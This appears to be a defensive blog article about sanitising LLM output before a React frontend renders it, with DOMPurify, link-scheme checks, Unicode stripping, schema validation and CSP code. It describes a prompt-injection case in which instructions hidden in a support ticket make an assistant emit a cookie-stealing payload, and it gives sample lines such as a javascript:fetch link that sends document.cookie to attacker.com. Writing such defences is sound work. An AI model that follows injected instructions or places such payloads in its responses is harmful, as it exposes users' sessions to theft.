Your Frontend Rendered It. Nobody Asked What the LLM Actually Sent.
A SaaS company ships a customer-facing AI assistant. The frontend is a clean React application — well-structured, properly componentized, reviewed by three senior engineers. The response streams in from the API, parses cleanly through the markdown renderer, and appears in the chat window exactly as designed.
Three weeks later, a security researcher files a report. A specific input — a support ticket containing instructions embedded in invisible Unicode characters — caused the AI assistant to include a hidden redirect payload in its response. The markdown renderer faithfully rendered it. The user's browser executed it. Session tokens left the building.
The LLM didn't write malware. It was manipulated into including content that the frontend rendered without question. Nobody had reviewed what the LLM was actually returning before it hit the renderer.
This is the gap. It's not exotic. It's architectural, and it can exist in any LLM-powered application that renders model output without inspecting it first.

The Trust Boundary That Got Misplaced
Traditional web security has a well-established principle: never trust user input. Sanitize it, validate it, escape it before it touches your DOM. This is so foundational that modern frameworks enforce it by default — React escapes by default, parameterised queries prevent SQL injection, CSP headers constrain script execution.
The mental model breaks the moment an LLM enters the stack.
Most teams make an implicit assumption when wiring an LLM API into their application: the LLM is part of our system, therefore its output is trusted system output.
This assumption is wrong in three distinct ways:
First: The LLM is not deterministic. The output space of a large language model is effectively unbounded — it can produce any text that is statistically plausible, including text that looks like HTML, text that looks like JavaScript, and text that contains Unicode control characters or bidirectional overrides that mean nothing in your monitoring dashboard but mean something specific to a browser renderer.
Second: The LLM processes external content. If your application allows users to paste content into prompts — support tickets, emails, documents — that external content enters the model's reasoning context. A well-designed prompt injection payload embedded in a customer email can cause the model to include attacker-controlled content in its response. That response then gets rendered by your trusted frontend.
Third: The LLM has no concept of your application's security boundaries. It doesn't know that a markdown link in its response will render as a clickable anchor tag. It doesn't know that certain Unicode sequences will be interpreted differently by different renderers. It generates text. What your application does with that text is entirely your responsibility.
The trust boundary was in the wrong place. LLM output is not trusted system output — it is third-party content that should be treated with the same suspicion you'd apply to user-supplied content.
What the LLM Is Actually Capable of Returning
Developers who haven't thought about this category of vulnerability often assume that LLM outputs are benign text. They are not.
Markdown injection via link targets:
A model that includes a link in its response generates markdown that your renderer processes. If the link target is javascript:fetch('https://attacker.com/?c='+document.cookie), your markdown renderer may produce an anchor tag that executes JavaScript when clicked.
<!-- The model returned this (from injected instructions): -->
For more information, [click here](javascript:alert(document.cookie))
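If the rendered HTML is inserted with React's dangerouslySetInnerHTML, the javascript: URL runs when the user clicks the link. Markdown libraries that emit raw HTML without validating URL schemes pass it straight through.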
Unicode bidirectional override attacks:
Unicode contains directional control characters, such as U+202E (right-to-left override) and U+200F (right-to-left mark), that change how text is rendered. Inserting them makes a sequence of characters display in a different order from the one in which it is stored. Code snippets in AI-generated content can be manipulated this way so that they display safe code while actually containing malicious code.
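Because these characters are invisible in most dashboards and log viewers, it helps to detect them explicitly. The following is a minimal sketch, not a complete detector: the helper name findBidiControls and the exact set of code points it checks are assumptions made for illustration.

```javascript
// Bidirectional formatting characters: marks (U+200E, U+200F),
// embeddings and overrides (U+202A-U+202E), isolates (U+2066-U+2069).
// The exact set is an assumption for this sketch; extend it as needed.
const BIDI_CONTROLS = /[\u200E\u200F\u202A-\u202E\u2066-\u2069]/g;

// Hypothetical helper: report the position and code point of each control character.
function findBidiControls(text) {
  const findings = [];
  for (const match of text.matchAll(BIDI_CONTROLS)) {
    const hex = match[0].codePointAt(0).toString(16).toUpperCase().padStart(4, '0');
    findings.push({ index: match.index, codePoint: 'U+' + hex });
  }
  return findings;
}

// A code snippet with a right-to-left override hidden after "isAdmin".
const suspicious = 'if (isAdmin\u202E) { grant(); }';
console.log(findBidiControls(suspicious));
```

Logging the findings alongside the raw response makes it possible to tell afterwards whether a given reply contained hidden directional controls.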
Hidden instruction exfiltration:
A model that has been successfully prompt-injected may attempt to exfiltrate data through the URL parameters of rendered links, through image src attributes that trigger requests to attacker-controlled servers, or through encoded content in response fields that a downstream component decodes and executes.
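One way to make this visible is to audit every link and image target in a response before it is rendered. The sketch below assumes a hypothetical host allowlist (TRUSTED_HOSTS) and uses a regular expression as a rough stand-in for real markdown parsing, so treat it as an auditing aid rather than a parser.

```javascript
// Hypothetical allowlist of hosts the assistant may link to or load images from.
const TRUSTED_HOSTS = new Set(['docs.example.com', 'cdn.example.com']);

// Collect the targets of markdown links [text](url) and images ![alt](url).
// The regex only approximates markdown syntax; it is meant for auditing.
function extractMarkdownTargets(markdown) {
  const pattern = /(!?)\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)/g;
  return Array.from(markdown.matchAll(pattern), (m) => ({
    kind: m[1] === '!' ? 'image' : 'link',
    url: m[2],
  }));
}

// Return every target that is not an https URL on a trusted host.
function findUntrustedTargets(markdown) {
  return extractMarkdownTargets(markdown).filter(({ url }) => {
    try {
      const parsed = new URL(url);
      return parsed.protocol !== 'https:' || !TRUSTED_HOSTS.has(parsed.hostname);
    } catch {
      return true; // relative or unparseable targets are flagged for review
    }
  });
}

const reply =
  'See ![status](https://attacker.example/p.png?d=c2VjcmV0) and ' +
  '[the docs](https://docs.example.com/start).';
console.log(findUntrustedTargets(reply));
```

An image target matters more than a link here because the browser requests it as soon as the message renders, with no click required.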
Structured output manipulation:
If your application uses the model's JSON output to populate UI components, an injected response might include values that, when rendered, trigger XSS or UI manipulation. Example: a username field containing <script>malicious code</script> that gets rendered without sanitisation.
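To illustrate the difference escaping makes, here is a small sketch. The renderGreeting function and the username field are hypothetical; the point is only that a model-supplied value is escaped before it is placed into markup.

```javascript
// Escape the five characters that are significant in HTML text and attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical component that builds markup from a model-supplied field.
function renderGreeting(modelOutput) {
  return `<p class="greeting">Hello, ${escapeHtml(modelOutput.username)}</p>`;
}

console.log(renderGreeting({ username: '<script>alert(1)</script>' }));
```

Frameworks such as React do this escaping automatically for text content; the risk appears when values are concatenated into HTML strings or passed to APIs that bypass the default.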

The Output Sanitisation Layer
The fix is treating LLM output as untrusted input and applying the same sanitisation you apply to user-submitted content.
Step 1: Strip dangerous HTML before rendering
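Before any LLM response is inserted into the DOM, pass the HTML through a sanitisation library. If you render markdown, sanitise the HTML the renderer produces: a javascript: link only becomes an anchor tag after rendering, so sanitising the raw markdown alone will not catch it.
import DOMPurify from 'dompurify';

// `html` is the markup about to be inserted into the DOM
// (for markdown responses, the renderer's output rather than the raw model text).
function sanitizeLLMResponse(html) {
  return DOMPurify.sanitize(html, {
    ALLOWED_TAGS: ['p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'code', 'pre', 'h1', 'h2', 'h3'],
    ALLOWED_ATTR: ['class'],
    // Block all href and src attributes by default
    FORBID_ATTR: ['href', 'src', 'onerror', 'onload', 'onclick'],
  });
}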
Step 2: Sanitise markdown links specifically
If your application renders markdown and should allow links, validate link targets explicitly:
import { marked } from 'marked';

const renderer = new marked.Renderer();
// Positional (href, title, text) arguments match older marked releases; newer
// releases pass a single token object, so check the version you have installed.
renderer.link = (href, title, text) => {
  // Only allow links that use the https:// scheme
  const allowedPrefixes = ['https://'];
  const isSafe = allowedPrefixes.some(prefix => href?.startsWith(prefix));
  if (!isSafe) {
    // Render as plain text, not a link
    return text;
  }
  return `<a href="${href}" rel="noopener noreferrer" target="_blank">${text}</a>`;
};
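If links should also be limited to specific hosts, string prefix checks are easy to get wrong: a prefix such as https://example.com also matches https://example.com.attacker.test. A sketch of a stricter check using the standard URL parser follows. The ALLOWED_LINK_HOSTS set and the isSafeLinkTarget name are assumptions for illustration.

```javascript
// Hypothetical allowlist; replace with the hosts your product actually links to.
const ALLOWED_LINK_HOSTS = new Set(['example.com', 'docs.example.com']);

// Parse the target and compare scheme and hostname exactly,
// instead of matching on string prefixes.
function isSafeLinkTarget(href) {
  if (typeof href !== 'string') return false;
  let url;
  try {
    url = new URL(href.trim());
  } catch {
    return false; // relative or malformed targets are rejected
  }
  return url.protocol === 'https:' && ALLOWED_LINK_HOSTS.has(url.hostname);
}

console.log(isSafeLinkTarget('https://docs.example.com/guide'));
console.log(isSafeLinkTarget('JaVaScRiPt:alert(1)'));
console.log(isSafeLinkTarget('https://example.com.attacker.test/'));
```

Parsing first means mixed-case schemes, embedded credentials, and lookalike hostnames are all judged on what the browser would actually request.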
Step 3: Strip Unicode control characters
function stripUnicodeControlCharacters(text) {
  // Remove bidirectional marks (U+200E, U+200F), embeddings and overrides
  // (U+202A to U+202E), and isolates (U+2066 to U+2069)
  return text.replace(/[\u200E-\u200F\u202A-\u202E\u2066-\u2069]/g, '');
}
Step 4: Validate structured outputs before use
If the model returns JSON that populates UI elements, validate the schema before rendering:
import { z } from 'zod';

const ProductRecommendationSchema = z.object({
  title: z.string().max(200),
  description: z.string().max(1000),
  // Explicit field validation: no unexpected fields can reach the UI
});

function validateLLMStructuredOutput(rawOutput) {
  try {
    return ProductRecommendationSchema.parse(JSON.parse(rawOutput));
  } catch {
    // Log the invalid response and return a safe fallback
    // (`logger` stands for your application's own logger)
    logger.warn('LLM returned invalid structured output', { raw: rawOutput });
    return null;
  }
}
Content Security Policy as a Defence Layer
CSP headers don't prevent LLM output manipulation, but they limit the blast radius if something does execute:
Content-Security-Policy:
  default-src 'self';
  script-src 'self' 'nonce-{random}';
  style-src 'self' 'unsafe-inline';
  img-src 'self' https: data:;
  connect-src 'self' https://api.openai.com;
  object-src 'none';
  base-uri 'self';
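A strict CSP prevents inline script execution even if an attacker somehow injects <script> tags into the rendered content. It is not a replacement for output sanitisation; it is a fallback when sanitisation fails. Note that img-src https: still lets an injected image request any HTTPS host, so narrow it to known hosts if image-based exfiltration is a concern.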
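The {random} placeholder in the policy has to be a fresh, unpredictable value on every response, otherwise an attacker can reuse it. Here is a minimal sketch for a Node.js server, written as CommonJS. The newNonce and buildCsp helper names are assumptions, and the directives simply mirror the example policy above.

```javascript
const { randomBytes } = require('node:crypto');

// Generate an unpredictable nonce; it must be fresh for every HTTP response.
function newNonce() {
  return randomBytes(16).toString('base64');
}

// Assemble the header value. Directives mirror the example policy above.
function buildCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "style-src 'self' 'unsafe-inline'",
    "img-src 'self' https: data:",
    "connect-src 'self' https://api.openai.com",
    "object-src 'none'",
    "base-uri 'self'",
  ].join('; ');
}

const nonce = newNonce();
const headerValue = buildCsp(nonce);
// In a request handler, send `headerValue` as the Content-Security-Policy
// header and put the same nonce on every <script> tag you intend to run.
console.log(headerValue);
```

Scripts injected through model output will not carry the nonce, so the browser refuses to run them even if they reach the DOM.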
The Complete Checklist
Before shipping any LLM-powered feature that renders model output in the browser:
- Apply HTML sanitisation (DOMPurify or equivalent) to all LLM responses before rendering
- Validate markdown link targets against an allowlist of allowed URL schemes
- Strip Unicode control and directional characters from all response text
- Validate structured JSON outputs against a defined schema before using values in the UI
- Implement a strict Content Security Policy that blocks inline script execution
- Test your sanitisation with known payloads: javascript: links, <script> tags, bidirectional override sequences
- Log raw LLM responses server-side before sanitisation so you can audit what the model actually returned
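The payload-testing item can be turned into a small regression check that runs against whatever sanitisation function you ship. This is a sketch under stated assumptions: the payload list is illustrative rather than exhaustive, and findLeaks and naiveSanitize are hypothetical names, with naiveSanitize standing in for a deliberately weak sanitiser.

```javascript
// Known-bad inputs from the checklist. Illustrative, not exhaustive.
const PAYLOADS = [
  { name: 'javascript: link', input: '[click here](javascript:alert(document.cookie))' },
  { name: 'script tag', input: 'Hello <script>alert(1)</script>' },
  { name: 'bidi override', input: 'safe\u202Etext' },
];

// Patterns that must never survive sanitisation.
const FORBIDDEN = [/javascript:/i, /<script/i, /[\u202A-\u202E\u2066-\u2069]/];

// Run every payload through `sanitize` and return the names of those that leak.
function findLeaks(sanitize) {
  return PAYLOADS.filter(({ input }) => {
    const output = sanitize(input);
    return FORBIDDEN.some((pattern) => pattern.test(output));
  }).map(({ name }) => name);
}

// A deliberately weak stand-in that only removes opening script tags.
const naiveSanitize = (text) => text.replace(/<script/gi, '');
console.log(findLeaks(naiveSanitize));
```

Wiring a check like this into CI means a change to the renderer or sanitiser configuration that reopens one of these holes fails the build instead of reaching users.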
The trust boundary didn't disappear when the LLM arrived. It got misplaced. LLM output that has processed untrusted user content is not trusted system output — it requires its own sanitisation gate.





